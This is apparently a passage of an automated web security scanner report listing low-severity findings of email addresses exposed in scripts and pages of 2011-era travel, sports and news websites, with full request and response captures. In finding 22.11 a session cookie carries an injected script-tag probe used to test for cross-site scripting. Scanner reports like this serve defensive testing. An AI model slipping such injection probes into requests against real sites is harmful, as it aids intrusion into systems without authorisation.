Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

22.1. http://a.cdn.intentmedia.net/javascripts/intent_media_cheaptickets_ads_fif.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.cdn.intentmedia.net
Path:   /javascripts/intent_media_cheaptickets_ads_fif.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascripts/intent_media_cheaptickets_ads_fif.js HTTP/1.1
Host: a.cdn.intentmedia.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cheaptickets.com/shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: We87IHuP5p5Fysz4CJRxyEs81doSpQRLw9Mso7D5hV9OSbyDZC2ESxKBmNea6Yos
x-amz-request-id: F160E7DD36AA2002
Date: Thu, 29 Sep 2011 17:35:40 GMT
Last-Modified: Thu, 29 Sep 2011 17:25:40 GMT
ETag: "f257077518d69e52afb4126f290fe2e0"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 60764
Server: AmazonS3
Age: 36132
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 1370393a90a510307b04ae2532851c3a46fc8c5b2a13c11112b9d186eaeae469dbc8d3abb476aff4
Via: 1.0 e07e2d5f2d026d31ffb267fe09e7913e.cloudfront.net:11180 (CloudFront), 1.0 1164012339a4caa525f23a2181c60d76.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

var IntentMedia=(function(a){a.IMPRESSION_SERVLET="impressions";a.CONVERSION_SERVLET="conversions";a.BEACON_SERVLET="beacons";a.CHECKIN_SERVLET="checkins";a.PRODUCT_CATEGORY_VALUES={FLIGHTS:"flights",
...[SNIP]...
<a href="mailto:sponsoredsearch@cheaptickets.com">sponsoredsearch@cheaptickets.com</a>
...[SNIP]...
22.2. http://ads2.adbrite.com/v0/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following email address was disclosed in the response:

Request

GET /v0/ad?sid=1861717&zx=0&zy=0&ww=0&wh=0&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; b="%3A%3A13beg%2C15sx4"

Response

HTTP/1.1 200 OK
Set-Cookie: b="%3A%3A13wid%2C13beg%2C15sx4"; path=/; domain=.adbrite.com; expires=Tue, 02-Oct-2012 01:53:09 GMT
Set-Cookie: vsd=0@1@4e891585@ads.pubmatic.com; path=/; domain=.adbrite.com; expires=Wed, 05-Oct-2011 01:53:09 GMT
Content-Type: application/x-javascript
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 03 Oct 2011 01:53:09 GMT
Content-Length: 298

document.writeln("<script type=\"text/javascript\">\nvar pubId=26620;\nvar siteId=26621;\nvar kadId=21556;\nvar kadwidth=300;\nvar kadheight=250;\nvar kadNetwork=6;\nvar kadtype=1;\n<\/script>\n<scrip
...[SNIP]...
22.3. http://ak-static.travel-ticker.com/static/images/1x1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak-static.travel-ticker.com
Path:   /static/images/1x1.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /static/images/1x1.jpg?ver=207657 HTTP/1.1
Host: ak-static.travel-ticker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travel-ticker.com/Destination/?tts=01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1212
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 00:39:00 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<link rev="made" href="mailto:unixadmin@hotwire.com" />
...[SNIP]...
<a href="mailto:unixadmin@hotwire.com">
...[SNIP]...
22.4. http://aon.com/js/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://aon.com
Path:   /js/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/s_code.js HTTP/1.1
Host: aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://aon.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20gpv_pageName%3D/site/search.jsp%7C1317605245122%3B; JSESSIONID=C81DF03B10ABEDA473F7CB693F3AAC01

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26688-1241617105000"
Last-Modified: Wed, 06 May 2009 13:38:25 GMT
Content-Type: text/javascript
Content-Length: 26688
Date: Mon, 03 Oct 2011 01:11:38 GMT

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...
22.5. http://httpd.apache.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://httpd.apache.org
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://httpd.apache.org/download.cgi
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: httpd.apache.org
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:15 GMT
Server: Apache/2.3.15-dev (Unix) mod_ssl/2.3.15-dev OpenSSL/1.0.0c
Last-Modified: Wed, 14 Sep 2011 06:24:38 GMT
ETag: "286ed7-25a8-4ace0d086f580-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9640
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/
...[SNIP]...
<meta name="email" content="docs@httpd.apache.org" />
...[SNIP]...
22.6. http://httpd.apache.org/download.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://httpd.apache.org
Path:   /download.cgi

Issue detail

The following email address was disclosed in the response:

Request

GET /download.cgi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: httpd.apache.org

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:11 GMT
Server: Apache/2.3.15-dev (Unix) mod_ssl/2.3.15-dev OpenSSL/1.0.0c
Vary: Accept-Encoding
Content-Length: 28373
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=u
...[SNIP]...
<meta name="email" content="docs@httpd.apache.org" />
...[SNIP]...
22.7. http://i.travelpn.com.edgesuite.net/jquery/plug-ins/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.travelpn.com.edgesuite.net
Path:   /jquery/plug-ins/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jquery/plug-ins/jquery.cookie.js?_=1317600495077 HTTP/1.1
Host: i.travelpn.com.edgesuite.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 11 May 2010 14:58:21 GMT
ETag: "1096"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 4246
Content-Type: application/x-javascript
Date: Mon, 03 Oct 2011 00:08:18 GMT
Connection: close

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...
22.8. http://i1.goal.com/web/goal/2011092112-rev15541/js/default/news/article-merged.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i1.goal.com
Path:   /web/goal/2011092112-rev15541/js/default/news/article-merged.js

Issue detail

The following email address was disclosed in the response:

Request

GET /web/goal/2011092112-rev15541/js/default/news/article-merged.js HTTP/1.1
Host: i1.goal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1479357280-1317599429942; __utma=167609825.336600251.1317599442.1317599442.1317599442.1; __utmb=167609825.1.10.1317599442; __utmc=167609825; __utmz=167609825.1317599442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _em_hl=1; _em_vt=6b3bfb104abb2666e789b9e202024e62e18088e413-981323754e88f8d5; _em_v=cf9911b66e4d49b949eaf13bd6fa4e88f8d57af834-210214684e88f8d5; l=en

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=31104000
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:58:46 GMT
Expires: Wed, 26 Sep 2012 23:58:46 GMT
Last-Modified: Fri, 30 Sep 2011 15:59:55 GMT
Server: ECS (sjo/5238)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 81486

var Goal=Goal||function(){var j={supportWebSocket:(window.WebSocket)?true:false,edition:self.location.pathname.replace(new RegExp("^/([^/]+).*$"),"$1"),secure_host:(self.location.host.indexOf("local")
...[SNIP]...
(2008/10/16)
* @requires jQuery v1.2.6 or later
*
* Examples and documentation at: http://code.google.com/p/lnet/wiki/jQueryStyledSelectOverview
*
* Copyright (c) 2008 Lasar Liepins, liepins.org, liepins@gmail.com
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restrict
...[SNIP]...
22.9. http://i1.goal.com/web/goal/2011092112-rev15541/js/default/section/team-merged.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i1.goal.com
Path:   /web/goal/2011092112-rev15541/js/default/section/team-merged.js

Issue detail

The following email address was disclosed in the response:

Request

GET /web/goal/2011092112-rev15541/js/default/section/team-merged.js HTTP/1.1
Host: i1.goal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=31104000
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:50:22 GMT
Expires: Wed, 26 Sep 2012 23:50:22 GMT
Last-Modified: Fri, 30 Sep 2011 15:59:55 GMT
Server: ECS (sjo/522A)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 82332

eval(function(h,b,i,d,g,f){g=function(a){return(a<b?"":g(parseInt(a/b)))+((a=a%b)>35?String.fromCharCode(a+29):a.toString(36));};if(!"".replace(/^/,String)){while(i--){f[g(i)]=d[i]||g(i);}d=[function(
...[SNIP]...
(2008/10/16)
* @requires jQuery v1.2.6 or later
*
* Examples and documentation at: http://code.google.com/p/lnet/wiki/jQueryStyledSelectOverview
*
* Copyright (c) 2008 Lasar Liepins, liepins.org, liepins@gmail.com
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restrict
...[SNIP]...
22.10. http://media.away.com/trip/tripjs/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.away.com
Path:   /trip/tripjs/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /trip/tripjs/s_code.js HTTP/1.1
Host: media.away.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.18 (Unix) DAV/2
Last-Modified: Fri, 23 Sep 2011 00:04:36 GMT
ETag: "34500c5-6095-4ad908dfe6d00"
Accept-Ranges: bytes
Content-Length: 24725
Content-Type: application/javascript
Cache-Control: max-age=86400
Date: Mon, 03 Oct 2011 00:35:01 GMT
Connection: close

/* SiteCatalyst code version: H.20.2.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
=s.mr($8,(vt#Wt`Zvt)`ks.hav()+q+(qs?qs:s.rq(^5)),0,i"
+"d,ta);qs`l;`Rm('t')`5s.p_r)s.p_r(`I`a`l}^I(qs);^Q`u($0;`m$0`b^1,`G$L1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`j''`5s.pg)`H^x@M=`H^xeo=`H^x`Q`r=`H^x`Q^2`l`5!id@Us.tc^ztc=1;s.flush`T()}`3#6`Ctl`0o,t,n,vo`1;s.@M="
+"$Co`I`Q^2=t;s.`Q`r=n;s.t($0}`5pg){`H^xco`0o){`P^t\"_\",1,$a`3$Co)`Cwd^xgs`0u@t`P^tun,1,$a`3s.t()`Cwd^xdc`0u@t`P^tun,$a`3s.t()}}@8=(`H`M`h`9`4$Bs@H0`Id=
...[SNIP]...
22.11. https://secure.mlb.com/shared/scripts/bam/bam.session.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.mlb.com
Path:   /shared/scripts/bam/bam.session.js

Issue detail

The following email address was disclosed in the response:

Request

GET /shared/scripts/bam/bam.session.js HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Accept-Language: en-us
Referer: https://secure.mlb.com/resetPassword.do
Accept: */*
Host: secure.mlb.com
Cookie: s_cc=true; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.0 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 31 Mar 2011 01:42:45 GMT
Content-Length: 4574
Accept-Ranges: bytes
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:01 GMT
Cache-Control: max-age=600
Edge-control: max-age=600
ETag: "11de-4d93dc15"
Age: 1
X-Cache: HIT from cache.mlb.com
Via: 1.1 cache.mlb.com:8889 (squid/2.7.STABLE6)
Connection: keep-alive

/**
* @fileOverview
* Session Helper Class for BAM Registration Services
*
* @author Jon Ferrer <jon.ferrer@mlb.com>
*
* @requires jquery.js
* @requires jquery.bindable.js
* @requires bam.js

...[SNIP]...
22.12. http://sorry.manutd.com/errorRedirector.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sorry.manutd.com
Path:   /errorRedirector.html

Issue detail

The following email address was disclosed in the response:

Request

GET /errorRedirector.html HTTP/1.1
Host: sorry.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "2354e432632545de44a52ac976d73826:1314871709"
Last-Modified: Thu, 01 Sep 2011 10:08:29 GMT
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:49:36 GMT
Content-Length: 13704
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-eq
...[SNIP]...
<a href="mailto:enquiries@manutd.co.uk">
...[SNIP]...
22.13. http://static.guim.co.uk/static/32b9600ebe43926107624a816c7870f8566f154f/common/external-scripts/jquery-libraries/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.guim.co.uk
Path:   /static/32b9600ebe43926107624a816c7870f8566f154f/common/external-scripts/jquery-libraries/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/32b9600ebe43926107624a816c7870f8566f154f/common/external-scripts/jquery-libraries/jquery.cookie.js HTTP/1.1
Host: static.guim.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 22 Sep 2011 14:01:03 GMT
Accept-Ranges: bytes
X-GU-httpd: 09
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Content-Length: 4247
Content-Type: application/x-javascript
Cache-Control: max-age=1520750
Expires: Thu, 20 Oct 2011 14:15:52 GMT
Date: Sun, 02 Oct 2011 23:50:02 GMT
Connection: close
Vary: Accept-Encoding

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...
22.14. http://travela.priceline.com/zp/zpcal/src/calendar-core.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /zp/zpcal/src/calendar-core.js

Issue detail

The following email address was disclosed in the response:

Request

GET /zp/zpcal/src/calendar-core.js HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:11:08 GMT
Server: Apache
Last-Modified: Wed, 28 Jul 2010 17:45:22 GMT
ETag: "e68091-1c0c2-48c762e8f1080"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 114882
Content-Type: text/javascript


// $Id: calendar-core.js 3672 2006-07-17 14:36:50Z slip $

/**
* The Calendar object constructor. Call it, for example, like this:
*
* \code
* // the following function is called when
...[SNIP]...
<support@zapatec.com>
...[SNIP]...
22.15. http://travelocity.ugc.bazaarvoice.com/module/0025-en_us/sy/0025-en_us/display.pkg.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travelocity.ugc.bazaarvoice.com
Path:   /module/0025-en_us/sy/0025-en_us/display.pkg.js

Issue detail

The following email address was disclosed in the response:

Request

GET /module/0025-en_us/sy/0025-en_us/display.pkg.js HTTP/1.1
Host: travelocity.ugc.bazaarvoice.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travel.travelocity.com/hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="Bazaarvoice does not have a P3P policy."
Last-Modified: Fri, 30 Sep 2011 14:20:29 GMT
Content-Type: text/javascript;charset=utf-8
Vary: Accept-Encoding
Content-Length: 67557
Cache-Control: max-age=594
Expires: Mon, 03 Oct 2011 00:21:14 GMT
Date: Mon, 03 Oct 2011 00:11:20 GMT
Connection: close

$BV.Internal.define("jquery.ui.core",[document],["jquery.core"],function(a,b){
/*
* jQuery UI 1.8.6
*
* Copyright 2010, AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT or GPL
...[SNIP]...
extend(c.ui.slider,{version:"1.8.6"})}(a))});
$BV.Internal.define("jquery.rating",[],["jquery.core"],function(a){
/*
### jQuery Star Rating Plugin v2.5 - 2008-09-10 ###
* http://www.fyneworks.com/ - diego@fyneworks.com
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/licenses/gpl.html
###
Project: http://plugins.jquery.com/project/Mult
...[SNIP]...
22.16. http://w.sharethis.com/button/buttons.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /button/buttons.js

Issue detail

The following email address was disclosed in the response:

Request

GET /button/buttons.js HTTP/1.1
Host: w.sharethis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
Expires: Tue, 04 Oct 2011 00:08:53 GMT
Cache-Control: max-age=86400
Content-Length: 60743
Date: Mon, 03 Oct 2011 00:26:58 GMT
Connection: close
Vary: Accept-Encoding

var cookie=new function(){return{setCookie:function(d,f,h){if(h){var c=new Date();c.setTime(c.getTime()+(h*24*60*60*1000));var a="; expires="+c.toGMTString()}else{var a=""}var b=d+"="+escape(f)+a;var
...[SNIP]...
